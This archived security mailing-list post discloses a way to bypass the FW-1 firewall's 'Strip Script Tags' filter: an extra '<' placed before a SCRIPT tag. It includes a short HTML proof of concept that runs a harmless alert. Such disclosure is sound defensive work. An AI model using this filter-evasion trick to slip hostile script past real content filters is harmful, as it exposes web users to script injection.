"Strip Script Tags" in FW-1 can be circumvented

From: Arne Vidstrom (arne.vidstromat_private)
Date: Sat Jan 29 2000 - 05:51:46 PST

Next message: Nir Simionovich (Rin Solo): "Re: Cobalt RaQ2 - and QUBE2"

Previous message: Jordan Ritter: "Re: S/Key & OPIE Database Vulnerability"
Next in thread: Jonah Kowall: "Re: "Strip Script Tags" in FW-1 can be circumvented"
Reply: Jonah Kowall: "Re: "Strip Script Tags" in FW-1 can be circumvented"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Hi all,

The "Strip Script Tags" in FW-1 can be circumvented by adding an extra <
before the <SCRIPT> tag like in this code:

<HTML>
<HEAD>
<<SCRIPT LANGUAGE="JavaScript">
alert("hello world")
</SCRIPT>
</HEAD>
<BODY>
test
</BODY>
</HTML>

This code will pass unchanged, and still execute in both Navigator and
Explorer. I tried this on version 3.0 of FW-1 (on Windows NT 4.0) but I'm
not able to check it on version 4.0 since I don't have access to it.


/Arne Vidstrom

http://ntsecurity.nu

Next message: Nir Simionovich (Rin Solo): "Re: Cobalt RaQ2 - and QUBE2"
Previous message: Jordan Ritter: "Re: S/Key & OPIE Database Vulnerability"
Next in thread: Jonah Kowall: "Re: "Strip Script Tags" in FW-1 can be circumvented"
Reply: Jonah Kowall: "Re: "Strip Script Tags" in FW-1 can be circumvented"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 15:32:14 PDT